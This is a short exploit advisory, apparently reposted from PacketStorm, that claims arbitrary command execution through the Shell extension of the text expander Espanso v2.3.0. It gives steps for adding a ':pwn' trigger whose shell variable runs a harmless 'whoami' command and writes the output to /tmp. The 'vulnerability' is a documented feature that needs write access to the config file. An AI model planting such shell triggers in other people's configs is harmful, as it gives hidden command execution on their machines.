Share
## https://sploitus.com/exploit?id=PACKETSTORM:220989
# Exploit Title: Espanso v2.3.0 - Shell Extension Arbitrary Command
    Execution (RCE)
    # Date: 2026-05-13
    # Exploit Author: Chokri Hammedi
    # Software: https://github.com/espanso/espanso/releases/tag/v2.3.0
    # Vendor: https://espanso.org/
    # Version: 2.3.0
    # Tested on: Linux
    #
    # Description:
    # The Shell extension in Espanso v2.3.0 allows arbitrary command execution.
    # An attacker who can modify the match configuration file can inject shell
    # commands that execute when the user types the trigger. No restart
    required.
    
    
    
    STEPS:
    
    1. Edit the match file:
    
       espanso edit
    
    
    2. Add this trigger:
    
    - trigger: ":pwn" replace: "{{output}}" vars: - name: output type: shell
    params: cmd: "whoami > /tmp/whoami.txt && echo PWNED"
    
    
    3. Open any text editor and type:
    
       :pwn
    
    
    4. Check result:
    
       cat /tmp/whoami.txt
    
       Output: user